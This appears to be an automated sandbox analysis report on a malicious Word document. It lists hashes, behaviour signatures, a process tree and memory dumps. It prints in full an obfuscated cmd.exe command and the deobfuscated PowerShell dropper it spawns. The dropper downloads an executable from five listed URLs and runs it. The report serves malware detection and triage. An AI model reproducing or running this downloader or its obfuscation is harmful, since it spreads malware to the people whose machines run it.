Analysis

  • max time kernel
    142s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/06/2024, 01:46

General

  • Target

    8c815b0e5df17ad8c3d669337605198c_JaffaCakes118.doc

  • Size

    122KB

  • MD5

    8c815b0e5df17ad8c3d669337605198c

  • SHA1

    7e29c2543811f73608bec589041815b5c196883f

  • SHA256

    5c2d4ed46e476ba2d23eb96eb2dc30c96ff6415dec2e4353aef9e7cd167695b9

  • SHA512

    cf8c00e5bec13e9ee134fcbb78d135cb493a9bc705e78957d6a1fc42295e340d67f509b5e37d0aeec997a08e247cca474ea5b8a5b9e0fb76f8e82fae4983eb5b

  • SSDEEP

    1536:2hJ81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadnBS77K5U+a9:2X8GhDS0o9zTGOZD6EbzCdB0W

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.brandywinematerials.com/I2CTXAByih

exe.dropper

http://www.pamka.tv/IG9MARZ

exe.dropper

http://www.ulsv.ru/MaG0o3h

exe.dropper

http://www.prokombank.ru/REwyMx2T

exe.dropper

http://www.gocarloans.com.au/1Hezijowh

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8c815b0e5df17ad8c3d669337605198c_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1376
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set 8wR=;'kEP'=SEi$}}{hctac}};kaerb;'Yzl'=KEW$;JQU$ metI-ekovnI{ )00008 eg- htgnel.)JQU$ metI-teG(( fI;'oiC'=ZCc$;)JQU$ ,NGC$(eliFdaolnwoD.wSf${yrt{)wwz$ ni NGC$(hcaerof;'exe.'+fbd$+'\'+pmet:vne$=JQU$;'NCS'=kiE$;'079' = fbd$;'okL'=Nji$;)'@'(tilpS.'hwojizeH1/ua.moc.snaolracog.www//:ptth@T2xMywER/ur.knabmokorp.www//:ptth@h3o0GaM/ur.vslu.www//:ptth@ZRAM9GI/vt.akmap.www//:ptth@hiyBAXTC2I/moc.slairetameniwydnarb.www//:ptth'=wwz$;tneilCbeW.teN tcejbo-wen=wSf$;'BbK'=wVd$ llehsrewop&&for /L %A in (470,-1,0)do set pZQ=!pZQ!!8wR:~%A,1!&&if %A lss 1 call %pZQ:~-471%"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\system32\cmd.exe
          CmD /V:O/C"set 8wR=;'kEP'=SEi$}}{hctac}};kaerb;'Yzl'=KEW$;JQU$ metI-ekovnI{ )00008 eg- htgnel.)JQU$ metI-teG(( fI;'oiC'=ZCc$;)JQU$ ,NGC$(eliFdaolnwoD.wSf${yrt{)wwz$ ni NGC$(hcaerof;'exe.'+fbd$+'\'+pmet:vne$=JQU$;'NCS'=kiE$;'079' = fbd$;'okL'=Nji$;)'@'(tilpS.'hwojizeH1/ua.moc.snaolracog.www//:ptth@T2xMywER/ur.knabmokorp.www//:ptth@h3o0GaM/ur.vslu.www//:ptth@ZRAM9GI/vt.akmap.www//:ptth@hiyBAXTC2I/moc.slairetameniwydnarb.www//:ptth'=wwz$;tneilCbeW.teN tcejbo-wen=wSf$;'BbK'=wVd$ llehsrewop&&for /L %A in (470,-1,0)do set pZQ=!pZQ!!8wR:~%A,1!&&if %A lss 1 call %pZQ:~-471%"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $dVw='KbB';$fSw=new-object Net.WebClient;$zww='http://www.brandywinematerials.com/I2CTXAByih@http://www.pamka.tv/IG9MARZ@http://www.ulsv.ru/MaG0o3h@http://www.prokombank.ru/REwyMx2T@http://www.gocarloans.com.au/1Hezijowh'.Split('@');$ijN='Lko';$dbf = '970';$Eik='SCN';$UQJ=$env:temp+'\'+$dbf+'.exe';foreach($CGN in $zww){try{$fSw.DownloadFile($CGN, $UQJ);$cCZ='Cio';If ((Get-Item $UQJ).length -ge 80000) {Invoke-Item $UQJ;$WEK='lzY';break;}}catch{}}$iES='PEk';
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4400
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3684 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:1656

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\366A5423.wmf

        Filesize

        502B

        MD5

        629cb2893780317d8e492a79e40ba6fc

        SHA1

        62898cc7bd2cfe4496de662a4844fc577865c01f

        SHA256

        267c422b494a597411472b7d845c7f0514dc6543b28eef69735ce4e44c93610d

        SHA512

        9ab464c64fb653066aa278460293cc00d0363241abd85029ece24a27496d8686692c948d6f78690ab923378cd62429c59b2b6bade48088cc59d3acf94e823f7d

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qrknynum.lej.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2144-7-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-103-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-4-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-6-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-5-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-0-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-8-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-9-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-10-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-11-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-13-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-12-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-1-0x00007FFEAA6AD000-0x00007FFEAA6AE000-memory.dmp

        Filesize

        4KB

      • memory/2144-14-0x00007FFE68110000-0x00007FFE68120000-memory.dmp

        Filesize

        64KB

      • memory/2144-2-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-28-0x00007FFEAA6AD000-0x00007FFEAA6AE000-memory.dmp

        Filesize

        4KB

      • memory/2144-29-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-30-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-27-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-3-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-104-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

        Filesize

        2.0MB

      • memory/2144-100-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-16-0x00007FFE68110000-0x00007FFE68120000-memory.dmp

        Filesize

        64KB

      • memory/2144-102-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/2144-101-0x00007FFE6A690000-0x00007FFE6A6A0000-memory.dmp

        Filesize

        64KB

      • memory/4400-68-0x0000021EC99E0000-0x0000021EC9A02000-memory.dmp

        Filesize

        136KB